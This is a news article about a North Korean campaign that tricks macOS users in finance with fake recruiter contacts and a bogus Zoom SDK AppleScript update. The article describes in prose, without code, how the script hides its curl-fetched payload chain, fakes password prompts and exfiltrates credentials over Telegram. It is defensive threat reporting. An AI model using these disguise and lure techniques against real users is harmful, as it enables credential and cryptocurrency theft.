Cyber-crime North Korea targets macOS users in latest heist Social engineering: 'low-cost, hard to patch, and scales well' Jessica Lyons Thu 16 Apr 2026 // 18:20 UTC North Korean criminals set on stealing Apple users' credentials and cryptocurrency are using a combination of social engineering and a fake Zoom software update to trick people into manually running malware on their own computers, according to Microsoft. Redmond's threat intelligence team tracks the Pyongyang-backed crew as Sapphire Sleet (aka APT38 ). The Lazarus Group offshoot has been in business since at least 2020, and primarily targets the finance sector to steal cryptocurrency wallets and intellectual property related to cryptocurrency trading and blockchain platforms. These attacks begin with social engineering. The crew creates fake recruiter profiles on social media and networking platforms like LinkedIn and then reaches out to finance professionals with phony job opportunities before scheduling a technical interview - that's the delivery mechanism for the malware. And they follow a rash of other social-engineering-enabled intrusions , including one in which North Korea-linked attackers socially engineered an Axios maintainer, compromised his account , and published malicious versions of the open source JavaScript library containing a remote-access trojan. "Social engineering lets attackers route around hardened perimeters by convincing users to act on their behalf, turning a human into the vulnerability. It's low-cost, hard to patch, and scales well," Sherrod DeGrippo, Microsoft global threat intelligence GM, told The Register . "Users are conditioned to accept remote support interactions like downloading tools, following instructions, clicking prompts," she added. "Attackers exploit this familiarity to make malicious actions feel routine, lowering victim skepticism at the critical moment of compromise." In its latest campaign, Sapphire Sleet sends victims a fake Zoom support meeting invite, and then instructs them to download a file called Zoom SDK Update.scpt. It's a compiled AppleScript that opens in macOS Script Editor by default and looks like a legitimate Zoom SDK update, beginning with a large comment block of update instructions to make it appear to be a real software update. Bad Apple(Script) commands Underneath the decoy content, the script inserts thousands of blank lines to push the malicious logic below the scrollable view of the Script Editor window and reduce the chances of the victim noticing it. First, it launches a command that invokes the legitimate macOS softwareupdate binary - but with an invalid parameter. This essentially does nothing but launch a trusted Apple‑signed process to make the software update look legitimate. Next, the script executes its malicious payload via curl to fetch a new attacker-controlled AppleScript that launches directly within the Script Editor context and ensures that additional payloads are dynamically downloaded and executed. "When the user opens the Zoom SDK Update.scpt file, macOS launches the file in Script Editor, allowing Sapphire Sleet to transition from a single lure file to a multi-stage, dynamically fetched payload chain," Redmond explained in a Thursday report. "From this single process, the entire attack unfolds through a cascading chain of curl commands, each fetching and executing progressively more complex AppleScript payloads. Each stage uses a distinct user-agent string as a campaign tracking identifier." Each curl user agent fetches a different piece of malware that serves its own purpose in the attack chain, from orchestration and backdooring victims' machines, to reconnaissance and registering the compromised system with Sapphire Sleet's command‑and‑control (C2) infrastructure, to bypassing macOS TCC protections , and ultimately harvesting credentials and exfiltrating sensitive data - wallets, browser history and other info, keychains, Apple Notes, and Telegram login details. Each stage of the campaign also abuses native Apple tools or mimics Apple naming conventions to disguise the illicit activity. For example: the host monitoring binary is called com.apple.cli to help mask the 5 MB Mach-O executable with an Apple-style naming convention. The credential stealer, delivered through an AppleScript payload executed via osascript, drops a malicious macOS application named systemupdate.app that masquerades as a software update utility and, when launched, displays a native macOS password dialog that closely resembles a legitimate system prompt. The dialog prompts the user to enter their password "to complete a software update," and this allows Sapphire Sleet to obtain valid user credentials, exfiltrating them by using the Telegram Bot API. Nork scammers work the blockchain to steal crypto from job hunters North Korea's Lazarus Group targets healthcare orgs with Medusa ransomware Suspected Nork digital intruders caught breaking into US healthcare, education orgs Fake Linux leader using Slack to con devs into giving up their secrets Additionally, one of the backdoors used in this campaign - icloudz - is named to mimic a legitimate iCloud‑related artifact, and also uses the macOS NSCreateObjectFileImageFromMemory API to load additional payloads directly into memory. Microsoft disclosed this campaign to Apple, and the mac maker has since implemented "platform-level protections to help detect and block infrastructure and malware associated with this campaign," we're told. Apple did not respond to The Register's inquiries. According to Redmond, however, Apple deployed Apple Safe Browsing protections in Safari to detect and block malicious infrastructure associated with this campaign, and also deployed XProtect signatures to detect and block the malware families linked to Sapphire Sleet. MacOS devices receive these signature updates automatically, so no need to do anything from a user perspective. One thing organizations can do to protect their users and themselves from falling victim to this and other social-engineering campaigns is to educate people about threats originating from LinkedIn and other social media sites, especially unsolicited communications asking users to download software or install virtual meeting tools. "Users should never run scripts or commands shared through messages, calls, or chats without prior approval from their IT or security teams," Redmond warns. ® Share More about Apple Cybercrime Microsoft More like these × More about Apple Cybercrime Microsoft North Korea Security Narrower topics 2FA Active Directory Advanced persistent threat AirTag Apple M1 Application Delivery Controller App stores Authentication Azure BEC Bing Black Hat BSides BSoD Bug Bounty Center for Internet Security CHERI CISO Common Vulnerability Scoring System Cybersecurity Cybersecurity and Infrastructure Security Agency Cybersecurity Information Sharing Act Data Breach Data Protection Data Theft DDoS DEF CON Digital certificate Encryption End Point Protection Excel Exchange Server Exploit Firewall Google Project Zero Hacker Hacking Hacktivism HoloLens iCloud Identity Theft iMac Incident response Infosec Infrastructure Security Internet Explorer iOS iPad iPhone iPod iTunes Kenna Security LinkedIn Mac MacBook Microsoft 365 Microsoft Build Microsoft Edge Microsoft Fabric Microsoft Ignite Microsoft Office Microsoft Surface Microsoft Teams NCSAM NCSC .NET Office 365 OS/2 Outlook Palo Alto Networks Password Patch Tuesday Personally Identifiable Information Phishing Pluton Quantum key distribution Ransomware Remote Access Trojan REvil RSA Conference Safari SharePoint Siri Skype Software Bill of Materials Spamming Spyware SQL Server Surveillance Tim Cook TLS Trojan Trusted Platform Module Visual Studio Visual Studio Code Vulnerability Wannacry Windows Windows 10 Windows 11 Windows 7 Windows 8 Windows Server Windows Server 2003 Windows Server 2008 Windows Server 2012 Windows Server 2013 Windows Server 2016 Windows Subsystem for Linux Windows XP Xbox Xbox 360 Zero trust Broader topics APAC Bill Gates Steve Jobs Steve Wozniak More about Share POST A COMMENT More about Apple Cybercrime Microsoft More like these × More about Apple Cybercrime Microsoft North Korea Security Narrower topics 2FA Active Directory Advanced persistent threat AirTag Apple M1 Application Delivery Controller App stores Authentication Azure BEC Bing Black Hat BSides BSoD Bug Bounty Center for Internet Security CHERI CISO Common Vulnerability Scoring System Cybersecurity Cybersecurity and Infrastructure Security Agency Cybersecurity Information Sharing Act Data Breach Data Protection Data Theft DDoS DEF CON Digital certificate Encryption End Point Protection Excel Exchange Server Exploit Firewall Google Project Zero Hacker Hacking Hacktivism HoloLens iCloud Identity Theft iMac Incident response Infosec Infrastructure Security Internet Explorer iOS iPad iPhone iPod iTunes Kenna Security LinkedIn Mac MacBook Microsoft 365 Microsoft Build Microsoft Edge Microsoft Fabric Microsoft Ignite Microsoft Office Microsoft Surface Microsoft Teams NCSAM NCSC .NET Office 365 OS/2 Outlook Palo Alto Networks Password Patch Tuesday Personally Identifiable Information Phishing Pluton Quantum key distribution Ransomware Remote Access Trojan REvil RSA Conference Safari SharePoint Siri Skype Software Bill of Materials Spamming Spyware SQL Server Surveillance Tim Cook TLS Trojan Trusted Platform Module Visual Studio Visual Studio Code Vulnerability Wannacry Windows Windows 10 Windows 11 Windows 7 Windows 8 Windows Server Windows Server 2003 Windows Server 2008 Windows Server 2012 Windows Server 2013 Windows Server 2016 Windows Subsystem for Linux Windows XP Xbox Xbox 360 Zero trust Broader topics APAC Bill Gates Steve Jobs Steve Wozniak TIP US OFF Send us news